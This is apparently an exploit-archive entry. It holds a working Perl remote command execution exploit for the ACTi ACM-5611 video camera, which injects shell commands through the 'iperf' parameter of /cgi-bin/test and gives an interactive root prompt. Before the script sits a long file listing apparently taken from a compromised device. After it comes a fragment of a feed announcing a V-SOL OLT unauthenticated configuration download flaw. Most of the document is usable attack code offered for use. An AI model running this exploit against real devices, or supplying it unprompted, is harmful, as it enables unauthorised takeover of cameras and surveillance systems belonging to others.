# # [ /etc/fstab
# # [ /etc/thttpd/thttpd.conf
# # [ /etc/thttpd/thttpd.throttles
# # [ /etc/services
# # [ /etc/resolv.conf
# # [ /etc/profile
# # [ /etc/init.d/rcS
# # [ /etc/init.d/bootstrap
# # [ /etc/init.d/oem_load
# # [ /etc/init.d/system_load
# # [ /etc/init.d/thttpd
# # [ /etc/init.d/daemon_manager
# # [ /etc/init.d/modules
# # [ /etc/init.d/ddns
# # [ /etc/init.d/syslog
# # [ /etc/init.d/hostname
# # [ /etc/init.d/set_port_speed
# # [ /etc/init.d/get_wan_config
# # [ /etc/init.d/myserver
# # [ /etc/init.d/wan
# # [ /etc/init.d/datetime
# # [ /etc/init.d/dns
# # [ /etc/init.d/boot_sync
# # [ /etc/init.d/profile_load
# # [ /etc/init.d/datetime_rackmount
# # [ /etc/group
# # [ /etc/passwd
# # [ /etc/host.conf
# # [ /etc/inittab
# # [ /etc/ppp/plugins/rp-pppoe.so
# # [ /etc/ppp/resolv.conf
# # [ /etc/ppp/ip-down
# # [ /etc/ppp/ip-up
# # [ /etc/protocols
# # [ /etc/config/update.conf
# # [ /etc/default/default.conf
# # [ /etc/default/version
# # [ /etc/default/default.pppoe
# # [ /etc/default/build_date
# # [ /etc/default/global_options
# # [ /etc/default/boot_version
# # [ /etc/default/profile/camera.bin
# # [ /etc/default/profile/firmware.bin
# # [ /etc/default/profile/profile_id
# # [ /etc/default/profile/NameMap
# # [ /etc/default/profile/camera_adj.bin
# # [ /etc/default/profile/fw_cap.bin
# # [ /etc/default/model
# # [ /etc/default/fw_type
# # [ /etc/default/device
# # [ /etc/default/mac
# # [ /etc/default/serial
# # [ /etc/default/property
# # [ /etc/hosts
# # [ /lib/ld-uClibc-0.9.15.so
# # [ /lib/libcrypt-0.9.15.so
# # [ /lib/libdl-0.9.15.so
# # [ /lib/libm-0.9.15.so
# # [ /lib/libpthread-0.9.15.so
# # [ /lib/libresolv-0.9.15.so
# # [ /lib/libuClibc-0.9.15.so
# # [ /lib/libutil-0.9.15.so
# # [ /lib/modules/2.4.19-rmk4/acap_drv.o
# # [ /lib/modules/2.4.19-rmk4/ds1339_rtc.o
# # [ /lib/modules/2.4.19-rmk4/sound_drv.o
# # [ /proc/mtd
# # [ /proc/asoc2200_eth/DATA
# # [ /proc/misc
# # [ /proc/cpu/alignment
# # [ /proc/tty/drivers
# # [ /proc/tty/ldiscs
# # [ /proc/tty/driver/serial
# # [ /proc/sys/abi/fake_utsname
# # [ /proc/sys/abi/trace
# # [ /proc/sys/abi/defhandler_libcso
# # [ /proc/sys/abi/defhandler_lcall7
# # [ /proc/sys/abi/defhandler_elf
# # [ /proc/sys/abi/defhandler_coff
# # [ /proc/sys/fs/lease-break-time
# # [ /proc/sys/fs/dir-notify-enable
# # [ /proc/sys/fs/leases-enable
# # [ /proc/sys/fs/overflowgid
# # [ /proc/sys/fs/overflowuid
# # [ /proc/sys/fs/dentry-state
# # [ /proc/sys/fs/dquot-nr
# # [ /proc/sys/fs/file-max
# # [ /proc/sys/fs/file-nr
# # [ /proc/sys/fs/inode-state
# # [ /proc/sys/fs/inode-nr
# # [ /proc/sys/net/unix/max_dgram_qlen
# # [ /proc/sys/net/ipv4/conf/eth0/arp_filter
# # [ /proc/sys/net/ipv4/conf/eth0/tag
# # [ /proc/sys/net/ipv4/conf/eth0/log_martians
# # [ /proc/sys/net/ipv4/conf/eth0/bootp_relay
# # [ /proc/sys/net/ipv4/conf/eth0/medium_id
# # [ /proc/sys/net/ipv4/conf/eth0/proxy_arp
# # [ /proc/sys/net/ipv4/conf/eth0/accept_source_route
# # [ /proc/sys/net/ipv4/conf/eth0/send_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/rp_filter
# # [ /proc/sys/net/ipv4/conf/eth0/shared_media
# # [ /proc/sys/net/ipv4/conf/eth0/secure_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/accept_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/eth0/forwarding
# # [ /proc/sys/net/ipv4/conf/default/arp_filter
# # [ /proc/sys/net/ipv4/conf/default/tag
# # [ /proc/sys/net/ipv4/conf/default/log_martians
# # [ /proc/sys/net/ipv4/conf/default/bootp_relay
# # [ /proc/sys/net/ipv4/conf/default/medium_id
# # [ /proc/sys/net/ipv4/conf/default/proxy_arp
# # [ /proc/sys/net/ipv4/conf/default/accept_source_route
# # [ /proc/sys/net/ipv4/conf/default/send_redirects
# # [ /proc/sys/net/ipv4/conf/default/rp_filter
# # [ /proc/sys/net/ipv4/conf/default/shared_media
# # [ /proc/sys/net/ipv4/conf/default/secure_redirects
# # [ /proc/sys/net/ipv4/conf/default/accept_redirects
# # [ /proc/sys/net/ipv4/conf/default/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/default/forwarding
# # [ /proc/sys/net/ipv4/conf/all/arp_filter
# # [ /proc/sys/net/ipv4/conf/all/tag
# # [ /proc/sys/net/ipv4/conf/all/log_martians
# # [ /proc/sys/net/ipv4/conf/all/bootp_relay
# # [ /proc/sys/net/ipv4/conf/all/medium_id
# # [ /proc/sys/net/ipv4/conf/all/proxy_arp
# # [ /proc/sys/net/ipv4/conf/all/accept_source_route
# # [ /proc/sys/net/ipv4/conf/all/send_redirects
# # [ /proc/sys/net/ipv4/conf/all/rp_filter
# # [ /proc/sys/net/ipv4/conf/all/shared_media
# # [ /proc/sys/net/ipv4/conf/all/secure_redirects
# # [ /proc/sys/net/ipv4/conf/all/accept_redirects
# # [ /proc/sys/net/ipv4/conf/all/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/all/forwarding
# # [ /proc/sys/net/ipv4/neigh/eth0/locktime
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_delay
# # [ /proc/sys/net/ipv4/neigh/eth0/anycast_delay
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_qlen
# # [ /proc/sys/net/ipv4/neigh/eth0/unres_qlen
# # [ /proc/sys/net/ipv4/neigh/eth0/gc_stale_time
# # [ /proc/sys/net/ipv4/neigh/eth0/delay_first_probe_time
# # [ /proc/sys/net/ipv4/neigh/eth0/base_reachable_time
# # [ /proc/sys/net/ipv4/neigh/eth0/retrans_time
# # [ /proc/sys/net/ipv4/neigh/eth0/app_solicit
# # [ /proc/sys/net/ipv4/neigh/eth0/ucast_solicit
# # [ /proc/sys/net/ipv4/neigh/eth0/mcast_solicit
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh3
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh2
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh1
# # [ /proc/sys/net/ipv4/neigh/default/gc_interval
# # [ /proc/sys/net/ipv4/neigh/default/locktime
# # [ /proc/sys/net/ipv4/neigh/default/proxy_delay
# # [ /proc/sys/net/ipv4/neigh/default/anycast_delay
# # [ /proc/sys/net/ipv4/neigh/default/proxy_qlen
# # [ /proc/sys/net/ipv4/neigh/default/unres_qlen
# # [ /proc/sys/net/ipv4/neigh/default/gc_stale_time
# # [ /proc/sys/net/ipv4/neigh/default/delay_first_probe_time
# # [ /proc/sys/net/ipv4/neigh/default/base_reachable_time
# # [ /proc/sys/net/ipv4/neigh/default/retrans_time
# # [ /proc/sys/net/ipv4/neigh/default/app_solicit
# # [ /proc/sys/net/ipv4/neigh/default/ucast_solicit
# # [ /proc/sys/net/ipv4/neigh/default/mcast_solicit
# # [ /proc/sys/net/ipv4/tcp_tw_reuse
# # [ /proc/sys/net/ipv4/icmp_ratemask
# # [ /proc/sys/net/ipv4/icmp_ratelimit
# # [ /proc/sys/net/ipv4/tcp_adv_win_scale
# # [ /proc/sys/net/ipv4/tcp_app_win
# # [ /proc/sys/net/ipv4/tcp_rmem
# # [ /proc/sys/net/ipv4/tcp_wmem
# # [ /proc/sys/net/ipv4/tcp_mem
# # [ /proc/sys/net/ipv4/tcp_dsack
# # [ /proc/sys/net/ipv4/tcp_ecn
# # [ /proc/sys/net/ipv4/tcp_reordering
# # [ /proc/sys/net/ipv4/tcp_fack
# # [ /proc/sys/net/ipv4/tcp_orphan_retries
# # [ /proc/sys/net/ipv4/inet_peer_gc_maxtime
# # [ /proc/sys/net/ipv4/inet_peer_gc_mintime
# # [ /proc/sys/net/ipv4/inet_peer_maxttl
# # [ /proc/sys/net/ipv4/inet_peer_minttl
# # [ /proc/sys/net/ipv4/inet_peer_threshold
# # [ /proc/sys/net/ipv4/route/min_adv_mss
# # [ /proc/sys/net/ipv4/route/min_pmtu
# # [ /proc/sys/net/ipv4/route/mtu_expires
# # [ /proc/sys/net/ipv4/route/gc_elasticity
# # [ /proc/sys/net/ipv4/route/error_burst
# # [ /proc/sys/net/ipv4/route/error_cost
# # [ /proc/sys/net/ipv4/route/redirect_silence
# # [ /proc/sys/net/ipv4/route/redirect_number
# # [ /proc/sys/net/ipv4/route/redirect_load
# # [ /proc/sys/net/ipv4/route/gc_interval
# # [ /proc/sys/net/ipv4/route/gc_timeout
# # [ /proc/sys/net/ipv4/route/gc_min_interval
# # [ /proc/sys/net/ipv4/route/max_size
# # [ /proc/sys/net/ipv4/route/gc_thresh
# # [ /proc/sys/net/ipv4/route/max_delay
# # [ /proc/sys/net/ipv4/route/min_delay
# # [ /proc/sys/net/ipv4/route/flush
# # [ /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_all
# # [ /proc/sys/net/ipv4/ip_local_port_range
# # [ /proc/sys/net/ipv4/tcp_max_syn_backlog
# # [ /proc/sys/net/ipv4/tcp_rfc1337
# # [ /proc/sys/net/ipv4/tcp_stdurg
# # [ /proc/sys/net/ipv4/tcp_abort_on_overflow
# # [ /proc/sys/net/ipv4/tcp_tw_recycle
# # [ /proc/sys/net/ipv4/tcp_fin_timeout
# # [ /proc/sys/net/ipv4/tcp_retries2
# # [ /proc/sys/net/ipv4/tcp_retries1
# # [ /proc/sys/net/ipv4/tcp_keepalive_intvl
# # [ /proc/sys/net/ipv4/tcp_keepalive_probes
# # [ /proc/sys/net/ipv4/tcp_keepalive_time
# # [ /proc/sys/net/ipv4/ipfrag_time
# # [ /proc/sys/net/ipv4/ip_dynaddr
# # [ /proc/sys/net/ipv4/ipfrag_low_thresh
# # [ /proc/sys/net/ipv4/ipfrag_high_thresh
# # [ /proc/sys/net/ipv4/tcp_max_tw_buckets
# # [ /proc/sys/net/ipv4/tcp_max_orphans
# # [ /proc/sys/net/ipv4/tcp_synack_retries
# # [ /proc/sys/net/ipv4/tcp_syn_retries
# # [ /proc/sys/net/ipv4/ip_nonlocal_bind
# # [ /proc/sys/net/ipv4/ip_no_pmtu_disc
# # [ /proc/sys/net/ipv4/ip_autoconfig
# # [ /proc/sys/net/ipv4/ip_default_ttl
# # [ /proc/sys/net/ipv4/ip_forward
# # [ /proc/sys/net/ipv4/tcp_retrans_collapse
# # [ /proc/sys/net/ipv4/tcp_sack
# # [ /proc/sys/net/ipv4/tcp_window_scaling
# # [ /proc/sys/net/ipv4/tcp_timestamps
# # [ /proc/sys/net/core/hot_list_length
# # [ /proc/sys/net/core/optmem_max
# # [ /proc/sys/net/core/message_burst
# # [ /proc/sys/net/core/message_cost
# # [ /proc/sys/net/core/mod_cong
# # [ /proc/sys/net/core/lo_cong
# # [ /proc/sys/net/core/no_cong
# # [ /proc/sys/net/core/no_cong_thresh
# # [ /proc/sys/net/core/netdev_max_backlog
# # [ /proc/sys/net/core/rmem_default
# # [ /proc/sys/net/core/wmem_default
# # [ /proc/sys/net/core/rmem_max
# # [ /proc/sys/net/core/wmem_max
# # [ /proc/sys/vm/max_map_count
# # [ /proc/sys/vm/max-readahead
# # [ /proc/sys/vm/min-readahead
# # [ /proc/sys/vm/page-cluster
# # [ /proc/sys/vm/pagetable_cache
# # [ /proc/sys/vm/kswapd
# # [ /proc/sys/vm/overcommit_memory
# # [ /proc/sys/vm/bdflush
# # [ /proc/sys/kernel/overflowgid
# # [ /proc/sys/kernel/overflowuid
# # [ /proc/sys/kernel/random/uuid
# # [ /proc/sys/kernel/random/boot_id
# # [ /proc/sys/kernel/random/write_wakeup_threshold
# # [ /proc/sys/kernel/random/read_wakeup_threshold
# # [ /proc/sys/kernel/random/entropy_avail
# # [ /proc/sys/kernel/random/poolsize
# # [ /proc/sys/kernel/threads-max
# # [ /proc/sys/kernel/cad_pid
# # [ /proc/sys/kernel/sem
# # [ /proc/sys/kernel/msgmnb
# # [ /proc/sys/kernel/msgmni
# # [ /proc/sys/kernel/msgmax
# # [ /proc/sys/kernel/shmmni
# # [ /proc/sys/kernel/shmall
# # [ /proc/sys/kernel/shmmax
# # [ /proc/sys/kernel/rtsig-max
# # [ /proc/sys/kernel/rtsig-nr
# # [ /proc/sys/kernel/printk
# # [ /proc/sys/kernel/ctrl-alt-del
# # [ /proc/sys/kernel/real-root-dev
# # [ /proc/sys/kernel/cap-bound
# # [ /proc/sys/kernel/tainted
# # [ /proc/sys/kernel/core_uses_pid
# # [ /proc/sys/kernel/panic
# # [ /proc/sys/kernel/domainname
# # [ /proc/sys/kernel/hostname
# # [ /proc/sys/kernel/version
# # [ /proc/sys/kernel/osrelease
# # [ /proc/sys/kernel/ostype
# # [ /proc/sysvipc/shm
# # [ /proc/sysvipc/msg
# # [ /proc/sysvipc/sem
# # [ /proc/net/packet
# # [ /proc/net/unix
# # [ /proc/net/udp
# # [ /proc/net/tcp
# # [ /proc/net/sockstat
# # [ /proc/net/snmp
# # [ /proc/net/netstat
# # [ /proc/net/raw
# # [ /proc/net/rt_cache_stat
# # [ /proc/net/rt_cache
# # [ /proc/net/route
# # [ /proc/net/arp
# # [ /proc/net/netlink
# # [ /proc/net/pppoe
# # [ /proc/net/dev_mcast
# # [ /proc/net/softnet_stat
# # [ /proc/net/dev
# # [ /proc/kcore
# # [ /proc/ksyms
# # [ /proc/slabinfo
# # [ /proc/cpuinfo
# # [ /proc/kmsg
# # [ /proc/execdomains
# # [ /proc/iomem
# # [ /proc/swaps
# # [ /proc/locks
# # [ /proc/cmdline
# # [ /proc/ioports
# # [ /proc/filesystems
# # [ /proc/interrupts
# # [ /proc/partitions
# # [ /proc/devices
# # [ /proc/stat
# # [ /proc/modules
# # [ /proc/version
# # [ /proc/meminfo
# # [ /proc/uptime
# # [ /proc/loadavg
# # [ /proc/1/environ
# # [ /proc/1/status
# # [ /proc/1/cmdline
# # [ /proc/1/stat
# # [ /proc/1/statm
# # [ /proc/1/maps
# # [ /proc/1/mem
# # [ /proc/1/mounts
# # [ /proc/2/environ
# # [ /proc/2/status
# # [ /proc/2/cmdline
# # [ /proc/2/stat
# # [ /proc/2/statm
# # [ /proc/2/maps
# # [ /proc/2/mem
# # [ /proc/2/mounts
# # [ /proc/3/environ
# # [ /proc/3/status
# # [ /proc/3/cmdline
# # [ /proc/3/stat
# # [ /proc/3/statm
# # [ /proc/3/maps
# # [ /proc/3/mem
# # [ /proc/3/mounts
# # [ /proc/4/environ
# # [ /proc/4/status
# # [ /proc/4/cmdline
# # [ /proc/4/stat
# # [ /proc/4/statm
# # [ /proc/4/maps
# # [ /proc/4/mem
# # [ /proc/4/mounts
# # [ /proc/5/environ
# # [ /proc/5/status
# # [ /proc/5/cmdline
# # [ /proc/5/stat
# # [ /proc/5/statm
# # [ /proc/5/maps
# # [ /proc/5/mem
# # [ /proc/5/mounts
# # [ /proc/6/environ
# # [ /proc/6/status
# # [ /proc/6/cmdline
# # [ /proc/6/stat
# # [ /proc/6/statm
# # [ /proc/6/maps
# # [ /proc/6/mem
# # [ /proc/6/mounts
# # [ find: /proc/7/fd: No such file or directory
# # [ /proc/7/environ
# # [ /proc/7/status
# # [ /proc/7/cmdline
# # [ /proc/7/stat
# # [ /proc/7/statm
# # [ /proc/7/maps
# # [ /proc/7/mem
# # [ /proc/7/mounts
# # [ /proc/14/environ
# # [ /proc/14/status
# # [ /proc/14/cmdline
# # [ /proc/14/stat
# # [ /proc/14/statm
# # [ /proc/14/maps
# # [ /proc/14/mem
# # [ /proc/14/mounts
# # [ /proc/132/environ
# # [ /proc/132/status
# # [ /proc/132/cmdline
# # [ /proc/132/stat
# # [ /proc/132/statm
# # [ /proc/132/maps
# # [ /proc/132/mem
# # [ /proc/132/mounts
# # [ /proc/142/environ
# # [ /proc/142/status
# # [ /proc/142/cmdline
# # [ /proc/142/stat
# # [ /proc/142/statm
# # [ /proc/142/maps
# # [ /proc/142/mem
# # [ /proc/142/mounts
# # [ /proc/153/environ
# # [ /proc/153/status
# # [ /proc/153/cmdline
# # [ /proc/153/stat
# # [ /proc/153/statm
# # [ /proc/153/maps
# # [ /proc/153/mem
# # [ /proc/153/mounts
# # [ /proc/154/environ
# # [ /proc/154/status
# # [ /proc/154/cmdline
# # [ /proc/154/stat
# # [ /proc/154/statm
# # [ /proc/154/maps
# # [ /proc/154/mem
# # [ /proc/154/mounts
# # [ /proc/157/environ
# # [ /proc/157/status
# # [ /proc/157/cmdline
# # [ /proc/157/stat
# # [ /proc/157/statm
# # [ /proc/157/maps
# # [ /proc/157/mem
# # [ /proc/157/mounts
# # [ /proc/164/environ
# # [ /proc/164/status
# # [ /proc/164/cmdline
# # [ /proc/164/stat
# # [ /proc/164/statm
# # [ /proc/164/maps
# # [ /proc/164/mem
# # [ /proc/164/mounts
# # [ /proc/171/environ
# # [ /proc/171/status
# # [ /proc/171/cmdline
# # [ /proc/171/stat
# # [ /proc/171/statm
# # [ /proc/171/maps
# # [ /proc/171/mem
# # [ /proc/171/mounts
# # [ /proc/172/environ
# # [ /proc/172/status
# # [ /proc/172/cmdline
# # [ /proc/172/stat
# # [ /proc/172/statm
# # [ /proc/172/maps
# # [ /proc/172/mem
# # [ /proc/172/mounts
# # [ /proc/173/environ
# # [ /proc/173/status
# # [ /proc/173/cmdline
# # [ /proc/173/stat
# # [ /proc/173/statm
# # [ /proc/173/maps
# # [ /proc/173/mem
# # [ /proc/173/mounts
# # [ /proc/174/environ
# # [ /proc/174/status
# # [ /proc/174/cmdline
# # [ /proc/174/stat
# # [ /proc/174/statm
# # [ /proc/174/maps
# # [ /proc/174/mem
# # [ /proc/174/mounts
# # [ /proc/175/environ
# # [ /proc/175/status
# # [ /proc/175/cmdline
# # [ /proc/175/stat
# # [ /proc/175/statm
# # [ /proc/175/maps
# # [ /proc/175/mem
# # [ /proc/175/mounts
# # [ /proc/16706/environ
# # [ /proc/16706/status
# # [ /proc/16706/cmdline
# # [ /proc/16706/stat
# # [ /proc/16706/statm
# # [ /proc/16706/maps
# # [ /proc/16706/mem
# # [ /proc/16706/mounts
# # [ /proc/16707/environ
# # [ /proc/16707/status
# # [ /proc/16707/cmdline
# # [ /proc/16707/stat
# # [ /proc/16707/statm
# # [ /proc/16707/maps
# # [ /proc/16707/mem
# # [ /proc/16707/mounts
# # [ /proc/16708/environ
# # [ /proc/16708/status
# # [ /proc/16708/cmdline
# # [ /proc/16708/stat
# # [ /proc/16708/statm
# # [ /proc/16708/maps
# # [ /proc/16708/mem
# # [ /proc/16708/mounts
# # [ /proc/16709/environ
# # [ /proc/16709/status
# # [ /proc/16709/cmdline
# # [ /proc/16709/stat
# # [ /proc/16709/statm
# # [ /proc/16709/maps
# # [ /proc/16709/mem
# # [ /proc/16709/mounts
# # [ /proc/26139/environ
# # [ /proc/26139/status
# # [ /proc/26139/cmdline
# # [ /proc/26139/stat
# # [ /proc/26139/statm
# # [ /proc/26139/maps
# # [ /proc/26139/mem
# # [ /proc/26139/mounts
# # [ /proc/29140/environ
# # [ /proc/29140/status
# # [ /proc/29140/cmdline
# # [ /proc/29140/stat
# # [ /proc/29140/statm
# # [ /proc/29140/maps
# # [ /proc/29140/mem
# # [ /proc/29140/mounts
# # [ /proc/29176/environ
# # [ /proc/29176/status
# # [ /proc/29176/cmdline
# # [ /proc/29176/stat
# # [ /proc/29176/statm
# # [ /proc/29176/maps
# # [ /proc/29176/mem
# # [ /proc/29176/mounts
# # [ /proc/7727/environ
# # [ /proc/7727/status
# # [ /proc/7727/cmdline
# # [ /proc/7727/stat
# # [ /proc/7727/statm
# # [ /proc/7727/maps
# # [ /proc/7727/mem
# # [ /proc/7727/mounts
# # [ /proc/7728/environ
# # [ /proc/7728/status
# # [ /proc/7728/cmdline
# # [ /proc/7728/stat
# # [ /proc/7728/statm
# # [ /proc/7728/maps
# # [ /proc/7728/mem
# # [ /proc/7728/mounts
# # [ /proc/7729/environ
# # [ /proc/7729/status
# # [ /proc/7729/cmdline
# # [ /proc/7729/stat
# # [ /proc/7729/statm
# # [ /proc/7729/maps
# # [ /proc/7729/mem
# # [ /proc/7729/mounts
# # [ /proc/23419/environ
# # [ /proc/23419/status
# # [ /proc/23419/cmdline
# # [ /proc/23419/stat
# # [ /proc/23419/statm
# # [ /proc/23419/maps
# # [ /proc/23419/mem
# # [ /proc/23419/mounts
# # [ /proc/14789/environ
# # [ /proc/14789/status
# # [ /proc/14789/cmdline
# # [ /proc/14789/stat
# # [ /proc/14789/statm
# # [ /proc/14789/maps
# # [ /proc/14789/mem
# # [ /proc/14789/mounts
# # [ /proc/14790/environ
# # [ /proc/14790/status
# # [ /proc/14790/cmdline
# # [ /proc/14790/stat
# # [ /proc/14790/statm
# # [ /proc/14790/maps
# # [ /proc/14790/mem
# # [ /proc/14790/mounts
# # [ /proc/14791/environ
# # [ /proc/14791/status
# # [ /proc/14791/cmdline
# # [ /proc/14791/stat
# # [ /proc/14791/statm
# # [ /proc/14791/maps
# # [ /proc/14791/mem
# # [ /proc/14791/mounts
# # [ /proc/16682/environ
# # [ /proc/16682/status
# # [ /proc/16682/cmdline
# # [ /proc/16682/stat
# # [ /proc/16682/statm
# # [ /proc/16682/maps
# # [ /proc/16682/mem
# # [ /proc/16682/mounts
# # [ /proc/22978/environ
# # [ /proc/22978/status
# # [ /proc/22978/cmdline
# # [ /proc/22978/stat
# # [ /proc/22978/statm
# # [ /proc/22978/maps
# # [ /proc/22978/mem
# # [ /proc/22978/mounts
# # [ /proc/22979/environ
# # [ /proc/22979/status
# # [ /proc/22979/cmdline
# # [ /proc/22979/stat
# # [ /proc/22979/statm
# # [ /proc/22979/maps
# # [ /proc/22979/mem
# # [ /proc/22979/mounts
# # [ /proc/27240/environ
# # [ /proc/27240/status
# # [ /proc/27240/cmdline
# # [ /proc/27240/stat
# # [ /proc/27240/statm
# # [ /proc/27240/maps
# # [ /proc/27240/mem
# # [ /proc/27240/mounts
# # [ /proc/27241/environ
# # [ /proc/27241/status
# # [ /proc/27241/cmdline
# # [ /proc/27241/stat
# # [ /proc/27241/statm
# # [ /proc/27241/maps
# # [ /proc/27241/mem
# # [ /proc/27241/mounts
# # [ /proc/20414/environ
# # [ /proc/20414/status
# # [ /proc/20414/cmdline
# # [ /proc/20414/stat
# # [ /proc/20414/statm
# # [ /proc/20414/maps
# # [ /proc/20414/mem
# # [ /proc/20414/mounts
# # [ /proc/9117/environ
# # [ /proc/9117/status
# # [ /proc/9117/cmdline
# # [ /proc/9117/stat
# # [ /proc/9117/statm
# # [ /proc/9117/maps
# # [ /proc/9117/mem
# # [ /proc/9117/mounts
# # [ /proc/9120/environ
# # [ /proc/9120/status
# # [ /proc/9120/cmdline
# # [ /proc/9120/stat
# # [ /proc/9120/statm
# # [ /proc/9120/maps
# # [ /proc/9120/mem
# # [ /proc/9120/mounts
# # [ /sbin/dhcpcd
# # [ /sbin/ez-ipupdate
# # [ /sbin/htpasswd
# # [ /sbin/iperf
# # [ /sbin/thttpd
# # [ /usr/sbin/mount_nfs_drive
# # [ /usr/sbin/ll
# # [ /usr/sbin/system_info
# # [ /usr/sbin/read_dev_info
# # [ /usr/sbin/acti_config
# # [ /usr/sbin/show_progress
# # [ /usr/sbin/ddns_monitor
# # [ /usr/sbin/wan_status
# # [ /usr/sbin/adsl-connect
# # [ /usr/sbin/adsl-setup
# # [ /usr/sbin/acti_report
# # [ /usr/sbin/pppd
# # [ /usr/sbin/pppoe
# # [ /usr/sbin/acti_upgrade
# # [ /usr/sbin/thttpd_monitor
# # [ /usr/sbin/acti_485
# # [ /usr/sbin/dbg
# # [ /usr/sbin/ntpclient
# # [ /usr/sbin/acti_upgradem
# # [ /usr/sbin/dhcp_retry
# # [ /usr/sbin/pppoe_monitor
# # [ /usr/sbin/acti_reboot
# # [ /usr/sbin/acti_msg
# # [ /usr/sbin/mount_tmpfs
# # [ /usr/sbin/shell_relay
# # [ /usr/sbin/acti_logger
# # [ /usr/sbin/boot_ctrl
# # [ /usr/sbin/acti_gpio
# # [ /usr/sbin/acti_rs485
# # [ /usr/sbin/acti_rtc
# # [ /usr/sbin/acti_reg
# # [ /usr/sbin/conf_sync
# # [ /usr/sbin/conf_convert
# # [ /usr/sbin/bin2devinfo
# # [ /usr/sbin/audio_tester
# # [ /usr/sbin/bin2profile
# # [ /usr/sbin/acti-server
# # [ /usr/bin/setsid
# # [ /var/run/dev.bin
# # [ /var/run/system_type
# # [ /var/run/channel
# # [ /var/run/sys_conf.bin
# # [ /var/run/wan_state
# # [ /var/run/wanip_config
# # [ /var/run/encoder_run
# # [ /var/log/systemlog.txt
# # [ /var/log/wan_info_brief.txt
# # [ /var/log/system_info_web.txt
# # [ /var/log/system_info_url.txt
# # [ /var/www/images/Space.gif
# # [ /var/www/images/bar.gif
# # [ /var/www/images/bar2.gif
# # [ /var/www/images/icon.gif
# # [ /var/www/images/layout.gif
# # [ /var/www/images/r0-100.gif
# # [ /var/www/images/header_red.jpg
# # [ /var/www/images/ie_error.bmp
# # [ /var/www/images/r0-255.gif
# # [ /var/www/images/ptz_center_1.gif
# # [ /var/www/images/ptz_down_1.gif
# # [ /var/www/images/ptz_left_1.gif
# # [ /var/www/images/ptz_leftdown_1.gif
# # [ /var/www/images/ptz_leftup_1.gif
# # [ /var/www/images/ptz_right_1.gif
# # [ /var/www/images/ptz_rightdown_1.gif
# # [ /var/www/images/ptz_rightup_1.gif
# # [ /var/www/images/ptz_up_1.gif
# # [ /var/www/images/add.jpg
# # [ /var/www/images/delete.jpg
# # [ /var/www/images/focusin.jpg
# # [ /var/www/images/focusout.jpg
# # [ /var/www/images/home.jpg
# # [ /var/www/images/reset.jpg
# # [ /var/www/images/tele.jpg
# # [ /var/www/images/wide.jpg
# # [ /var/www/images/Num00.jpg
# # [ /var/www/images/Num01.jpg
# # [ /var/www/cgi-bin/cmd/system
# # [ /var/www/cgi-bin/cmd/mpeg4
# # [ /var/www/cgi-bin/cmd/encoder
# # [ /var/www/cgi-bin/cmd/.htpasswd
# # [ /var/www/cgi-bin/80503736
# # [ /var/www/cgi-bin/update
# # [ /var/www/cgi-bin/updatem
# # [ /var/www/cgi-bin/macdev
# # [ /var/www/cgi-bin/system
# # [ /var/www/cgi-bin/mpeg4
# # [ /var/www/cgi-bin/test
# # [ /var/www/cgi-bin/encoder
# # [ /var/www/cgi-bin/web1.cgi
# # [ /var/www/default.css
# # [ /var/www/index.htm
# # [ /var/www/profile/cze.bin
# # [ /var/www/profile/dan.bin
# # [ /var/www/profile/eng.bin
# # [ /var/www/profile/fin.bin
# # [ /var/www/profile/fre.bin
# # [ /var/www/profile/ger.bin
# # [ /var/www/profile/hun.bin
# # [ /var/www/profile/ita.bin
# # [ /var/www/profile/jap.bin
# # [ /var/www/profile/lang_table.bin
# # [ /var/www/profile/por.bin
# # [ /var/www/profile/sch.bin
# # [ /var/www/profile/spa.bin
# # [ /var/www/profile/tch.bin
# # [ /var/www/nvEPLMedia.ocx
# # [ /var/www/pid
# # [ #
# #
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ ACTi ACM-5611 Video Camera Remote Command Execution Exploit
[ ============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
";
if(not defined $ARGV[0])
{
print "[ Usage: perl $0 [target]\n";
print "[ Example: perl $0 192.168.1.1\n\n";
exit;
}
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request);
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
print "[ Server: ", $response->header('Server'), "\n";
print "[ The target is vulnerable\n";
print "[\n[ Directory Traversal\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $host.$_->attr('href'), "\n" for @files;
print "[\n[ Got root?\n";
while(1){
my $cmd;
print "[ \# ";
chomp($cmd = <STDIN>);
if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
exit if $cmd eq 'exit';
my $target = $host."/cgi-bin/test?iperf=;".$cmd;
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ ", $_, "\n" for split(/\n/,$response->content());
}
} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}
↧
V-SOL GPON/EPON OLT Platform 2.03 Unauthenticated Configuration Download
V-SOL GPON/EPON OLT Platform version 2.03 suffers from an unauthenticated configuration download vulnerability.
fe152994b0410c54dd85432f305cb715
V-SOL GPON/EPON OLT Platform v2.03 Unauthenticated Configuration Download
